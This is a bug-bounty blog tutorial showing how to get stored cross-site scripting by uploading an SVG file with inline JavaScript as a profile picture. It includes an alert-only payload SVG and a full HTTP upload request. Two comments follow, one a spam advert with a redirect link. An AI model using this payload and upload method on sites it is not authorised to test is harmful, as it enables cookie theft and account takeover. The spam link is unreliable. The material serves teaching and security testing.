XSS SVG

Slack Group

Before we get started I have started a slack group dedicated to hacking. We welcome everyone from beginner to advanced to join. I will be on everyday answer questions, doing CTFs, and talking about cool hacks. If you enjoy hacking and are looking for like minded people join below:

NEW Hacking Group Slack Channel

Introduction

Cross site scripting(XSS) is a very common bug which involves injecting javascript code in web pages. This vulnerability can be used to do all kinds of things from stealing users cookies to bypassing SOP via CORS. There are numerous ways to locate XSS vulnerabilities, SVG files are normally overlooked.

SVG File

Scalable Vector Graphics(SVG) is an XML-based vector image format for two-dimensional graphics with support for interactivity and animation.

The below code is an example of a basic SVG file that will show a picture of a rectangle:

<svg width="400" height="110">
  <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>

SVG files also support inline javascript code. For instance a developer might use javascript in an svg image so they can manipulate it in real time. This can be used for animation and other tasks.

Another thing to note is that SVG files can be treated as images in HTML. This means you can place a SVG file in a image tag and it will render perfectly:

<img src="rectangle.svg" alt="Rectangle" height="42" width="42">

XSS

If a website loads a SVG file with an XSS payload it will get executed. This is often over looked by developers and attackers alike. An example SVG file with an alert XSS payload can be found below:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("Ghostlulz XSS");
   </script>
</svg>

One easy way to test for this vulnerability is to upload a SVG file as your profile picture as shown in the below burp requests:

POST /profile/upload HTTP/1.1
Host: XXXXXXXXX.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer XXXXXXXXXXXXXXXXXX
Content-Type: multipart/form-data; boundary=---------------------------232181429808
Content-Length: 574
Connection: close
Referer: https://XXXXXXXXX
-----------------------------232181429808
Content-Disposition: form-data; name="img"; filename="img.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("Ghostlulz XSS");
   </script>
</svg>
-----------------------------232181429808--

Notice the content type is set to :

Content-Type: image/svg+xml

Once the image is uploaded you just need to find out what path it was uploaded to. This can easily be done by right clicking the image and selecting “copy image address” , if your using google chrome. If everything worked when you view the image your payload will execute. You just got stored XSS via a SVG file.

Conclusion

XSS is everywhere and almost every one is looking for it when doing bug bounties or a penetration test. Sometimes the SVG file gets over looked by the developers. If this happens you can attempt to upload a SVG file as your profile picture or something else and when you view this file your XSS payload will execute.

8 thoughts on “XSS SVG”

  1. Thanks for some other wonderful article. The place else could anybody get that type of information in such an ideal manner of writing?
    I’ve a presentation subsequent week, and I’m on the search for such information.

  2. Hello, I’m contacting you to ask if you’re looking for a better link indexer. We just have left the beta test phase (GSA forum) and the feedback is excellent. As you know the old references in the field are less effective since several Google updates. This is not our case.
    Our service is the best for Google but also index Bing and Yandex. Our formulas are all unlimited, submissions AND number of URLs, which makes them the best companion for SEO agencies.

    We therefore offer you 24 hours of testing when you wish to prove that we are the best: http://lamp-dev.ru/redirect.php?to=http://www.miniurlz.com/LP-IN2

    Pass: G8D2EZ9P3

    See you soon

    Pass: G8D2EZ9P3

    Perspective on your own quickly

Leave a Reply

Your email address will not be published. Required fields are marked *